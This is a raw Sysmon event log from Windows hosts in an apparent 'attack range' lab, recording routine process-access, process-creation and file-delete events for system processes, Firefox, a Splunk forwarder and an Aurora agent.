12:22:44.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+26002|c:\windows\system32\rpcss.dll+41031|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.098{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe10.0.14393.82 (rs1_release.160805-1735)SettingsMicrosoft® Windows® Operating SystemMicrosoft CorporationSystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanelC:\Windows\ImmersiveControlPanel\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=A91F621A8A0DE91FAE53D3051303809B,SHA256=E768FF1F2F31178FE5930F261ACD4B19464ACC019FB0AA697D0B48686E59050C,IMPHASH=1812A9B9265AD93B24FA9FCBFAFBC4A6{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000042835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000042834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000042833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+f881b0|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11ed7|C:\Windows\System32\user32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFE2E09B)|UNKNOWN(FFFFF3D9DFE2DFD2)|UNKNOWN(FFFFF3D9DFF12279)|UNKNOWN(FFFFF3D9DFEB74F1)|UNKNOWN(FFFFF3D9DFEB8173)|UNKNOWN(FFFFF3D9DFEAFD49)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\user32.dll+1ea2e 10341000x800000000000000042832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.068{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.068{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.066{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.066{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.051{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.051{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.051{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.051{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.020{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25F067982ECF8D0831871848F1C2A98A,SHA256=8636E929581ADFB5E828E8D1D76029430C7C2BE3031F35E976C3CF41C6554253,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016731Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:45.975{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849FD900553B83BD5C342737E005BE76,SHA256=9F3B681709B083A81869CE4DEAC52AEA056AEC1B4D5357C554C85A9F575E27DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000042945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.775{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.496{FE4C2B44-E493-63C7-3A06-00000000AF02}71086228C:\Windows\system32\ApplicationFrameHost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinapi.appcore.dll+1e95e|C:\Windows\System32\twinapi.appcore.dll+1e3d1|C:\Windows\System32\twinapi.appcore.dll+1dbcc|C:\Windows\System32\twinapi.appcore.dll+1d863|C:\Windows\System32\ApplicationFrame.dll+1bb3c|C:\Windows\System32\ApplicationFrame.dll+12a22|C:\Windows\System32\ApplicationFrame.dll+11961|C:\Windows\System32\ApplicationFrame.dll+11289|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.496{FE4C2B44-E493-63C7-3A06-00000000AF02}71086228C:\Windows\system32\ApplicationFrameHost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinapi.appcore.dll+1e95e|C:\Windows\System32\twinapi.appcore.dll+1e3d1|C:\Windows\System32\twinapi.appcore.dll+1dbcc|C:\Windows\System32\twinapi.appcore.dll+1d863|C:\Windows\System32\ApplicationFrame.dll+1aec2|C:\Windows\System32\ApplicationFrame.dll+1c874|C:\Windows\System32\ApplicationFrame.dll+100f4|C:\Windows\System32\ApplicationFrame.dll+12a9a|C:\Windows\System32\ApplicationFrame.dll+11961|C:\Windows\System32\ApplicationFrame.dll+11289|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.496{FE4C2B44-E493-63C7-3A06-00000000AF02}71086228C:\Windows\system32\ApplicationFrameHost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinapi.appcore.dll+1e95e|C:\Windows\System32\twinapi.appcore.dll+1e3d1|C:\Windows\System32\twinapi.appcore.dll+1dbcc|C:\Windows\System32\twinapi.appcore.dll+1d863|C:\Windows\System32\ApplicationFrame.dll+1aec2|C:\Windows\System32\ApplicationFrame.dll+1a578|C:\Windows\System32\ApplicationFrame.dll+100e3|C:\Windows\System32\ApplicationFrame.dll+12a9a|C:\Windows\System32\ApplicationFrame.dll+11961|C:\Windows\System32\ApplicationFrame.dll+11289|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.491{FE4C2B44-E493-63C7-3A06-00000000AF02}71086228C:\Windows\system32\ApplicationFrameHost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinapi.appcore.dll+1e95e|C:\Windows\System32\twinapi.appcore.dll+1e3d1|C:\Windows\System32\twinapi.appcore.dll+1dbcc|C:\Windows\System32\twinapi.appcore.dll+1d863|C:\Windows\System32\ApplicationFrame.dll+1aec2|C:\Windows\System32\ApplicationFrame.dll+1c76e|C:\Windows\System32\ApplicationFrame.dll+100d2|C:\Windows\System32\ApplicationFrame.dll+12a9a|C:\Windows\System32\ApplicationFrame.dll+11961|C:\Windows\System32\ApplicationFrame.dll+11289|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 